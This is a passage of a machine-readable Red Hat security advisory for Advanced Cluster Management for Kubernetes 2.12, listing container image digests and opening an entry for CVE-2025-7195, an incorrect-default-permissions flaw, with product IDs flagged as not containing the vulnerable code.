"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Antony Di Scala",
"Michael Whale",
"James Force"
]
}
],
"cve": "CVE-2025-7195",
"cwe": {
"id": "CWE-276",
"name": "Incorrect Default Permissions"
},
"discovery_date": "2025-07-04T08:54:01.878000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
